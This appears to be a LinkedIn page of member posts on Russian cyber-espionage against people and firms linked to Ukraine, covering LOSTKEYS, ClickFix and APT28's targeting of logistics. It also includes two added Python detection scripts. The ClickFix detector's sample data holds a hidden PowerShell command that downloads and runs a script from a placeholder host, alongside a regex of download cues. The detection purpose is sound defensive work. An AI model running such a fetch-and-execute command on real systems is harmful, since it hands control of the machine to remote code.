Cybersecurity Risks for Ukraine-Linked Professionals


Summary

Cybersecurity risks for Ukraine-linked professionals refer to the specific online threats faced by individuals and organizations connected to Ukraine, especially amid ongoing cyberwarfare and espionage campaigns. These risks involve targeted attacks such as phishing, malware deployment, credential theft, and real-time surveillance, often orchestrated by hostile state-backed hacker groups aiming to disrupt support for Ukraine or steal sensitive information.

  • Stay alert for phishing: Be cautious with emails, messages, and unexpected login prompts, as attackers often impersonate trusted contacts or organizations to steal passwords and spread malware.
  • Secure your devices: Regularly update software, use strong, unique passwords, and enable multi-factor authentication to make it harder for hackers to access your accounts or systems.
  • Protect sensitive information: Limit sharing of critical data—such as shipment details or personal identifiers—and review who has access to important files, especially if you work in logistics, government, or defense-related roles.

Summarized by AI based on LinkedIn member posts
  • Serhii Demediuk, Chairman of the Board at Institute of Cyber Warfare Research. National Security and Defence of Ukraine. Cyber Technologies and AI.

    Ukrainian Cyber Defense

    Over the past two weeks, the activity of russian hacker groups and special units has remained low. Their primary objective continues to be gaining access to information systems of state agencies, situational awareness systems of the Ukrainian Defense Forces, and personal and official accounts of government officials and military personnel. The most effective and prevalent attack vector employed by the enemy involves phishing emails and messages sent through Signal, WhatsApp, Telegram, as well as the distribution of malware via infected USB drives and compromised popular software images. The most frequently observed malware families being disseminated include DarkTortilla, IDAT Loader, MassLogger, QuasarRAT, Remcos RAT, Vidar, and XWorm.

    Additionally, there has been a notable increase in demand among russian intelligence services on Darknet forums for purchasing Instagram accounts of Ukrainian citizens. Accounts associated with popular Ukrainian email services i.ua and ukr.net are especially prioritized. These accounts could potentially be used for information operations and spreading malware.

    The FSB’s 18th Center hacker group UAC-0036/Callisto has begun deploying new malware named LOSTKEYS in cyberattacks targeting current and former high-ranking officials in partner countries, journalists, research centers, NGOs, and companies supporting Ukraine. The new malware is disseminated through targeted, personalized email campaigns and is designed to steal account credentials and files. The group employs a sophisticated multi-stage tactic called ClickFix, starting with the creation of a decoy site with a fake CAPTCHA. During CAPTCHA verification, a PowerShell script is copied to the clipboard along with instructions on how to execute it. Once executed, the script downloads the subsequent malware components.

    The low level of enemy activity against Ukraine may be linked to russia’s intensified efforts to interfere in the political and economic processes of EU countries and former Soviet states. Specifically, there is ongoing interference in the presidential elections in Poland. In the lead-up to the election day, Russian intelligence units are ramping up their capabilities to spread disinformation and conduct destructive cyberattacks.

    A significant development is the release of a new policy draft by the International Criminal Court, which proposes extending its jurisdiction to include cybercrimes. The draft introduces amendments to the Rome Statute, expanding the four main types of international crimes — genocide, war crimes, crimes against humanity, and international military aggression — to include cybercrimes. The ICC Prosecutor is considering expanding its mandate in response to the extensive use of cyberattacks by Russia against civilian targets, both in Ukraine and EU countries.

    The war continues. Ukrainians defend their land and independence. #cyberwar #cyberdefence P.S. cyber weapons in the sense of AI
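The ClickFix chain described in the post above (a clipboard-supplied PowerShell one-liner that the victim is told to paste into the Run dialog) leaves a recognisable shape in endpoint telemetry: a script host spawned by explorer.exe with a hidden window and a download cue in its command line. Added example, not code from the post or from any vendor: a Python check over constructed Sysmon-style process-creation records; field names, paths and the sample command lines are assumptions.

```python
# Added example (not from the post above): a minimal detection for the
# ClickFix pattern described there, i.e. a user pasting a clipboard-supplied
# PowerShell one-liner into the Run dialog. The event records are constructed
# to resemble Sysmon Event ID 1 (process creation) fields; field names and
# values are assumptions, not taken from any real incident.
import re

# Hallmarks of the technique as described: a script host spawned by explorer.exe
# (the Run dialog is hosted by the shell), window hidden, and a download cue.
DOWNLOAD_CUES = re.compile(
    r"(downloadstring|invoke-webrequest|iwr\b|iex\b|invoke-expression|"
    r"frombase64string|-enc\b|-encodedcommand)", re.IGNORECASE)
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe")

def is_clickfix_like(event: dict) -> bool:
    """Return True when one process-creation event matches the ClickFix shape."""
    image = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    cmd = event.get("CommandLine", "")
    if image not in SCRIPT_HOSTS or parent != "explorer.exe":
        return False
    hidden = re.search(r"-w(indowstyle)?\s+hidden", cmd, re.IGNORECASE) is not None
    return hidden and DOWNLOAD_CUES.search(cmd) is not None

def scan(events):
    """Return the indexes of events that look like ClickFix executions."""
    return [i for i, e in enumerate(events) if is_clickfix_like(e)]

# Constructed sample events: one benign admin script run, one ClickFix-shaped
# launch from the Run dialog, one PowerShell started from a terminal.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -File C:\ops\rotate-logs.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"iex (New-Object Net.WebClient)"
                    ".DownloadString('https://example.invalid/verify')\""},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\WindowsTerminal.exe",
     "CommandLine": "powershell -NoProfile"},
]

if __name__ == "__main__":
    for i in scan(SAMPLE_EVENTS):
        print(f"suspicious event {i}: {SAMPLE_EVENTS[i]['CommandLine']}")
```

The parent-process condition is what separates this from ordinary scripted administration; pair it with the RunMRU registry value on the host to confirm the user actually pasted the command.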

  • Austin Larsen, Principal Threat Analyst | Google Threat Intelligence Group

    Our team at Google Threat Intelligence Group is sharing new findings on the evolving tactics of COLDRIVER. This Russian government-backed group, historically focused on credential phishing, is now deploying new malware called LOSTKEYS to exfiltrate documents from targeted systems. We've observed LOSTKEYS campaigns in early 2025 targeting current and former advisors to Western governments, military, journalists, and NGOs, often those connected to Ukraine. The primary goal appears to be intelligence collection. We're sharing this information, including technical details, IOCs, and YARA rules, to help the security community protect against these threats. We've added identified malicious domains and files to Safe Browsing and alerted targeted Google users. We encourage at-risk individuals to use Google's Advanced Protection Program and enable Enhanced Safe Browsing. Read the full report here: https://lnkd.in/gNk39vSR

  • Roberto Lafforgue, Diplomat / Naval Officer / Strategic Advisor / CEO +47.000 Global Followers 🌐 Fixers & Thinkers

    A joint cybersecurity advisory, involving a dozen allied agencies including France’s ANSSI, has documented a large-scale cyber-espionage campaign led by Russia’s #GRU🇷🇺🐻 Unit 26165 (APT28/Fancy Bear). Active since 2022, the operation targets Western logistics and tech firms involved in coordinating and delivering military aid to Ukraine.

    * What is happening? The campaign seeks to obtain sensitive logistical data—such as shipment contents, routes, and identities of senders and recipients.

    * How is it being conducted? APT28 uses spearphishing, brute force, credential theft, and software exploits (e.g., Outlook, Roundcube, WinRAR), as well as hacked IP cameras. Once access is gained, they leverage native tools (Impacket, PsExec, RDP), abuse Active Directory, and exfiltrate data via IMAP or EWS. Mailbox permissions are manipulated for prolonged espionage. IP cameras, particularly near the Ukrainian border and in countries like #Romania and #Poland, are exploited for real-time surveillance using default or brute-forced credentials.

    * Who is being targeted? The campaign impacts #NATO members and Ukraine, affecting both government and private entities across defense, transportation, maritime, and IT sectors. Critical infrastructure like air traffic systems, ports, and industrial control systems are among the main targets.

    Why it matters: This advisory underscores the need for increased vigilance among #Ukraine🇺🇦-supporting entities. It highlights a sophisticated, persistent threat actor aiming to undermine Western logistical and military support through targeted cyber intrusions.
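The persistence step the post singles out, mailbox permissions manipulated for prolonged espionage, is visible in Exchange administrative audit logs if someone looks for it. Added example, not code from the advisory or the post: a Python check over constructed, simplified admin-audit records that flags standing-access grants to accounts outside an allow-list and, separately, an account granting itself rights to another mailbox; field names, accounts and the allow-list are assumptions.

```python
# Added example (not from the advisory or the post above): an audit-log check
# for the "mailbox permissions are manipulated for prolonged espionage" step
# described there. Records are constructed to resemble simplified Exchange
# admin-audit entries; field names, accounts and the allow-list are assumptions.

# Delegation rights that give a third party standing access to a mailbox.
HIGH_RISK_RIGHTS = {"FullAccess", "ReadPermission", "Owner", "Reviewer"}
# Accounts expected to receive delegated access (assumed service/admin accounts).
EXPECTED_GRANTEES = {"svc-backup@example.invalid", "it-helpdesk@example.invalid"}
WATCHED_OPERATIONS = {"Add-MailboxPermission", "AddFolderPermissions",
                      "ModifyFolderPermissions", "Add-RecipientPermission"}

def check_record(rec: dict):
    """Return a finding dict for one audit record, or None if it looks routine."""
    if rec.get("Operation") not in WATCHED_OPERATIONS:
        return None
    p = rec.get("Parameters", {})
    mailbox, grantee, actor = p.get("Identity", ""), p.get("User", ""), rec.get("UserId", "")
    rights = {r.strip() for r in p.get("AccessRights", "").split(",")}
    if not rights & HIGH_RISK_RIGHTS or grantee in EXPECTED_GRANTEES:
        return None
    # An account granting itself rights to another mailbox is the classic
    # self-delegation step after a credential compromise; flag it separately.
    reason = ("actor granted itself access to another mailbox"
              if actor.lower() == grantee.lower()
              else "standing access granted to non-allow-listed account")
    return {"mailbox": mailbox, "grantee": grantee, "actor": actor,
            "rights": sorted(rights & HIGH_RISK_RIGHTS), "reason": reason}

def scan(records):
    """Apply check_record to every record and keep only the findings."""
    return [f for f in map(check_record, records) if f is not None]

# Constructed sample records: a routine backup-account grant, a self-delegation
# onto a logistics mailbox, and an unrelated Set-Mailbox change.
SAMPLE_RECORDS = [
    {"Operation": "Add-MailboxPermission", "UserId": "admin@example.invalid",
     "Parameters": {"Identity": "ceo@example.invalid",
                    "User": "svc-backup@example.invalid", "AccessRights": "FullAccess"}},
    {"Operation": "Add-MailboxPermission", "UserId": "ops-user@example.invalid",
     "Parameters": {"Identity": "logistics-ops@example.invalid",
                    "User": "ops-user@example.invalid", "AccessRights": "FullAccess"}},
    {"Operation": "Set-Mailbox", "UserId": "admin@example.invalid",
     "Parameters": {"Identity": "ceo@example.invalid", "RetentionPolicy": "Default"}},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_RECORDS):
        print(f"{f['reason']}: {f['actor']} -> {f['mailbox']} ({', '.join(f['rights'])})")
```

Run the same logic over the real audit export for the retention window, and review every hit against a change ticket; a grant with no ticket behind it is the investigation lead.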

  • Robert Nogacki, Founder & Managing Partner at Skarbiec Law Firm Group | Attorney for Entrepreneurs | Award-Winning Legal Advisor

    Major Cybersecurity Alert - Russian GRU Unleashes Sophisticated Campaign Against Western Supply Lines

    A devastating new intelligence report reveals how Russian military hackers have been systematically infiltrating the backbone of Western aid to Ukraine - targeting the very companies moving critical supplies across borders.

    The Scope is Staggering:
    • 85th Main Special Service Center (Unit 26165) - Russia's elite cyber warfare unit - has compromised dozens of logistics companies across 13 countries
    • Victims include major transportation hubs, ports, airports, maritime companies, and IT service providers
    • The operation spans from Bulgaria to the United States, with over 10,000 IP cameras hijacked to monitor aid shipments in real-time

    Their Methods: The hackers didn't just break into networks - they studied their targets like predators. They identified key personnel, mapped business relationships, and exploited trust between partner companies. Once inside, they accessed the most sensitive intelligence: train schedules, shipping manifests, container numbers, cargo contents, and exact travel routes of aid shipments to Ukraine.

    The Most Disturbing Discovery: Russians positioned themselves to watch everything. They compromised traffic cameras and private security cameras near border crossings and military installations. Camera targets were positioned to monitor aid flowing into the country. They could literally watch Western aid arrive and coordinate attacks accordingly.

    How They Got In:
    • Exploited Microsoft Outlook vulnerabilities to steal credentials
    • Used fake login pages impersonating government entities
    • Weaponized WinRAR file compression software
    • Conducted massive password-spraying campaigns
    • Even attempted voice phishing, calling victims while impersonating IT staff

    The Persistence Factor: Once inside corporate email systems, they manipulated mailbox permissions for sustained access, enrolled compromised accounts in multi-factor authentication to appear legitimate, and used legitimate Microsoft Exchange protocols to blend their data theft with normal business operations.

    Why This Matters: This isn't just corporate espionage - it's military intelligence gathering that directly threatens Ukrainian defense capabilities. Every compromised shipment manifest potentially enables Russian forces to target aid convoys, anticipate weapon deliveries, or disrupt critical supply chains. The investigation involved 15+ international intelligence agencies, highlighting how seriously Western governments view this threat. Organizations handling sensitive logistics or supporting Ukrainian aid efforts should immediately review their cybersecurity posture and monitor for the specific indicators outlined in this advisory.

    #CyberSecurity #Ukraine #Russia #NationalSecurity #Logistics

  • Gaurav Ranade, C-Suite Leader | India’s Top Cyber Security Influencer | CTO of the Year ‘23- ‘24 & ‘25 | Awarded CIO & CTO | Technology Leader | 28+ Yrs | ISO 27001/42001 | CISA | CISM | CCIE | Critical Infrastructure Architect | PhD Scholar

    #CyberWarfare is No Longer #Theoretical. It’s #Tactical, #Coordinated, and #Global.

    Sharing the official SSSCIP 3-Year Cybersecurity Report from #Ukraine — "WAR AND CYBER: Three Years of Struggle and Lessons for Global Security" (2022–2024). This report is not just a recount of Ukraine’s #resilience under relentless cyberattacks during full-scale war — it is a blueprint for national-level cyber defense, strategic coordination, and international collaboration.

    Inside the Report:
    - Deep analysis of over 4,000+ cyber incidents from 2022–2024
    - Tactical evolution of Russian #APT groups including #Sandworm, #Gamaredon & #APT29
    - How cyber operations were synchronized with missile strikes
    - Critical infrastructure targeting strategy: Energy → Telecom → IT Systems
    - Ukraine’s transition from cyber resilience to proactive cyber defense
    - Joint response frameworks for NATO, EU & global allies

    Key Takeaways:
    - Cyber #threats now accompany every kinetic operation.
    - Cyber #defense is not only about tools — it’s about real-time coordination between governments, private sector, and international #CERTs.
    - Global cyber resilience depends on collective visibility, intelligence sharing, and shared infrastructure protections.

    Read the full whitepaper to understand how modern warfare is fought on invisible frontlines: Let’s work toward a more secure digital future — together.

    #CyberSecurity #WarAndCyber #UkraineCyberDefense #APT #SSSCIP #CyberResilience #NationalSecurity #GlobalSecurity #ThreatIntelligence #NATO #CyberReport #CyberWarfare #CERTUA
